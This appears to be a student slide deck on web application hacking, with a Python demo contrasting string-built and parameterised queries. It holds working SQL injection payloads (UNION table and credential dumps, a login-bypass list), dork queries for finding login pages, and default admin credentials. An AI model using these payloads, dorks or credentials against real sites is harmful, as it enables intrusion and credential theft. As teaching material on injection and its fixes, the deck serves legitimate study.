You have to know how attackers crack your web site, so you can make your website safe.
Are You Secure?
Team:
Septema Umna Maulida (1312530247)
Ronny Tanjung (1311530263)
Wirawan Satyadi (1311530230)
Muhammad Fahmi (1312530148)
Fajar Agung Rizki (1311530404)
Bayu Laksono (1311530396)
Mai Gani Tamim (1311530107)
Rian Nurjaman (1311530123)
Husein Allmasyhur (1311530214)
Rudi Fredrick (0911530335)
Web Application Hacking
Typical Web Application set-up (diagram)
Web client -> HTTP request (cleartext or SSL) -> Firewall -> Web server (Apache, IIS, Netscape, etc.) -> Web apps (plugins: Perl, C/C++, JSP, etc.) -> Database connection (ADO, ODBC, etc.) -> SQL database
HTTP reply back to the client: HTML, JavaScript, VBScript, etc.
Utility of Firewalls (diagram)
Hacks on OS network services (Sun RPC, NT ipc$, wu-ftpd) are stopped by the firewall before they reach the web server, web apps and database behind it.
Firewalls cannot prevent (diagram series: web client -> web server -> web app -> DB; the attack travels inside an ordinary HTTP request that the firewall lets through):
web server mis-configuration
URL interpretation attacks
poor checking of user inputs: input validation attacks
extended SQL statements: SQL query poisoning
reverse-engineering HTTP cookies: HTTP session hijacking, impersonation
URL Injection
Client side, the URL the browser sends:
  http://localhost/ronie/uas/index.php?status=detail&id=40
Server side, the PHP that handles it ($ID goes into the query unquoted and unvalidated, which is the bug):
  $ID = $_GET['id'];
  $hasil = mysql_query("SELECT * FROM news WHERE ID = $ID order by id desc");

Example URL injection queries
Syntax: union select all 1,table_name,3,4,5,6 from information_schema.tables where table_schema=database()--
  To list the table names in the current database
Syntax: union select all 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()--
  To list the column names of the tables in the current database (group_concat joins them into one field)
Syntax: union select all 1,group_concat(IDLogin,0x3a,Pass),3,4,5,6 from userweb--
  To dump the records of the userweb table (0x3a is ':', used as the separator between login and password)
The UNION must return the same number of columns as the original SELECT (six for the news table here), which is why the placeholders 1,3,4,5,6 pad the selected column.

Client side, the injected URL:
  http://localhost/ronie/uas/index.php?status=detail&id=40 union select all 1,table_name,3,4,5,6 from information_schema.tables where table_schema=database()--
Server side, the query MySQL actually runs (the -- turns the application's trailing order by into a comment):
  SELECT * FROM news WHERE ID = 40 union select all 1,table_name,3,4,5,6 from information_schema.tables where table_schema=database()-- order by id desc
SQL Injection
Login flow (diagram): Internet -> Web login page (Username: Bob, Password: MyPass123) -> Apache server -> login_script2.php -> MySQL library -> MySQL server
Query template in login_script2.php:
  Select * from User_Table where user='%user' and pass='%pass'
With Bob / MyPass123 substituted:
  Select * from User_Table where user='Bob' and pass='MyPass123'

MySQL Injection
Same flow, but the attacker types ' or 1=1-- as the username (or appends it to the password). The query becomes:
  Select * from User_Table where user='' or 1=1-- ' and pass=''
Everything after -- is a comment, so the WHERE clause reduces to user='' or 1=1, which is true for every row: the first user in the table is logged in without a password.
Login box
A common query:
SELECT * from table WHERE id=$id
We could inject a malicious query in this way:
http://www.host.com/file?id="malicious_code"
Search queries for finding login pages:
inurl:login.php
index of:/admin/login.php
index of login.php

Play with SQL Injection:
Injection query variations:
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
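The two attacks above, the UNION-based data extraction through the news id parameter and the ' or 1=1-- login bypass, as an added, runnable example that is not part of the original slides. It uses an in-memory SQLite database in place of the deck's MySQL server, so sqlite_master stands in for information_schema.tables and || / ':' for group_concat's 0x3a separator; the column layout of news and the stored passwords are assumptions made for the example. Each vulnerable query is shown beside the parameterised form that defeats the same payload.

```python
import sqlite3


def make_db():
    """Constructed sample database standing in for the deck's MySQL schema.
    Only news, userweb(IDLogin, Pass) and User_Table(user, pass) come from the
    slides; the other column names and the row contents are assumptions."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE news (id INTEGER, title TEXT, body TEXT,
                           author TEXT, created TEXT, status TEXT);
        INSERT INTO news VALUES (40, 'Welcome', 'first post', 'ronie',
                                 '2013-01-01', 'published');
        CREATE TABLE userweb (IDLogin TEXT, Pass TEXT);
        INSERT INTO userweb VALUES ('admin', 's3cret');
        CREATE TABLE User_Table (user TEXT, pass TEXT);
        INSERT INTO User_Table VALUES ('Bob', 'MyPass123');
    """)
    return con


# --- vulnerable: string-built queries, as in the slides -------------------

def news_detail_vulnerable(con, id_param):
    """Mirrors mysql_query("SELECT * FROM news WHERE ID = $ID order by id desc")
    with $ID copied straight out of the URL."""
    sql = f"SELECT * FROM news WHERE id = {id_param} ORDER BY id DESC"
    return con.execute(sql).fetchall()


def login_vulnerable(con, username, password):
    """Mirrors: Select * from User_Table where user='%user' and pass='%pass'."""
    sql = (f"SELECT * FROM User_Table WHERE user='{username}' "
           f"AND pass='{password}'")
    return con.execute(sql).fetchall()


# --- hardened: same queries, values bound instead of interpolated ---------

def news_detail_safe(con, id_param):
    """Type-check the id, then bind it; the SQL text never changes."""
    try:
        news_id = int(id_param)
    except ValueError:
        return []  # not a number: reject instead of interpolating
    return con.execute("SELECT * FROM news WHERE id = ? ORDER BY id DESC",
                       (news_id,)).fetchall()


def login_safe(con, username, password):
    """Bound parameters: quotes and -- in the input are data, not SQL.
    (Real code would compare a password hash, not a plaintext column.)"""
    return con.execute("SELECT * FROM User_Table WHERE user=? AND pass=?",
                       (username, password)).fetchall()


# Payloads from the slides, adapted to SQLite: six columns to match news,
# sqlite_master instead of information_schema.tables, || and ':' for 0x3a.
ENUM_TABLES = ("40 union select all 1,name,3,4,5,6 "
               "from sqlite_master where type='table'--")
DUMP_USERS = ("40 union select all 1,group_concat(IDLogin||':'||Pass),3,4,5,6 "
              "from userweb--")
LOGIN_BYPASS = "' or 1=1--"


if __name__ == "__main__":
    con = make_db()
    print("vulnerable, tables :", [r[1] for r in news_detail_vulnerable(con, ENUM_TABLES)])
    print("vulnerable, creds  :", [r[1] for r in news_detail_vulnerable(con, DUMP_USERS)])
    print("vulnerable, bypass :", login_vulnerable(con, LOGIN_BYPASS, "anything"))
    print("safe, tables       :", news_detail_safe(con, ENUM_TABLES))
    print("safe, bypass       :", login_safe(con, LOGIN_BYPASS, "anything"))
    print("safe, real login   :", login_safe(con, "Bob", "MyPass123"))
```

Against MySQL the same payloads need the deck's original spelling (information_schema.tables, group_concat(IDLogin,0x3a,Pass)) and a space after the -- comment marker, which the application's trailing " order by id desc" happens to supply.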
Directory Browsing
Application Default
Printer Buffer Overflow (IIS 5 Internet Printing ISAPI extension): http://www.zzzz.com/null.printer
FrontPage Server Extensions Buffer Overflow: http://www.zzzz.com/_vti_bin/_vti_aut/fp30reg.dll
Compaq Insight Manager (CIM) web agent: http://www.zzzz.com:2301, default username:password pairs administrator:administrator, administrator:[Null], operator:operator
Statistics/usage pages: /stat, /webstat, /wwwstats
Search Queries
THE END